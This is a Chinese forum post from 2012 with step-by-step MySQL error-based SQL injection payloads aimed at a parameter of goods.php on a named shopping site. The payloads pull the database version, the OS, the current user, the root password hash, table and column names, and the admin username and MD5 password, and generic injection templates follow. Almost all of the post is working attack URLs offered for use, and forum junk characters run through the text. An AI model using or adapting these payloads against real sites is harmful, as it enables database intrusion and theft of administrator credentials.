标题: 盲注详细内容 [打印本页] 作者: admin 时间: 2012-9-5 14:59 标题: 盲注详细内容 判断版本号 ! o. C5 j6 a+ N, a$ F5 S) v5 q2 x# Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ; K" A9 p/ H- o1 b2 N5 h" E! ]( P) i; R% ?7 q
判断系统8 n; X9 F, [8 i* j. I, b
8 g9 w! b) d1 w, L& Y http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 , [$ j1 v+ m5 u' O; g2 z " ~+ d W! K! w. h& R & k, B) ?3 M3 t, R, v 2 L) q9 f$ T8 X' K- d2 a7 y当前 user(). J" T9 [; S- e( r8 m5 D: W
# O- I5 C$ q1 O http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 * a8 E: x3 [0 r4 f. d% k; j9 ? 7 [: o3 @* I$ s' j' ] 7 P' y1 G# y$ w: @0 K% ^6 w2 f$ O j4 Y% Y
当前 database() 7 ?2 C& n/ U5 f& K" n' K1 [$ Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. }6 a& |/ W2 N& o' R& S
- b x" w w; R; k1 O
3 c7 n: j w( D( A 6 U U. u* V3 X* M " v; H' |3 Q: Nroot hash7 Q0 Q) u5 W8 d4 J5 O4 ]
0 j" X1 r% l* v5 T" Phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 x$ ^4 n. c2 j
8 @: a" r; w) D6 a, G
' {1 B' k8 Z5 I) B4 _* q! T" g+ h: s, G
! R* c. F$ g: A0 e
当前 数据库表名 $ [; [3 k6 v0 V! H: m. l % c8 c3 g* t' D$ chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( N) a6 \ ~0 X& R- v. l- a, y
3 a6 _# i$ y; b
4 Z4 e7 u# y; G" y7 {
( b' a- i ]9 M. q. p% o1 q2 ?8 O8 V- s当前 数据库 user_name 字段7 q$ j% Z+ x! w; q% n% p6 m3 K
5 }( g! w6 s1 U5 F: g R5 x M3 U http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 2 o( j' q- w8 e3 k. }7 U9 W z" @/ H/ ^% ^
当前 数据库 字段 password $ M0 U9 {8 E# _8 l* Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 + A5 F9 A _. R+ a) W7 Y( f: b. Z, |
& k' s3 @% N/ j! F$ X/ F: N! y0 e& l- r( X. r$ X" v3 T
获得 admin passwd(md5)4 ]) ~0 m7 K( [! a, g
: l2 D0 I8 \ a6 ^; n' i! U- r. v
* { K" \0 g/ J' w http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 P, G. j! e- d% ]: {- w) K1 i
. {% ]! N: A5 V' |2 M/ T报错注射 6 T* M) j6 I" g. B# }SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) : E$ n) V) P! z4 ?9 W. K( z+ w# I1 Y. P+ o2 j: m E
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)6 m- O8 `. p& j
( o: D: ?. H$ Q- @3 p8 w) M0 ?
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)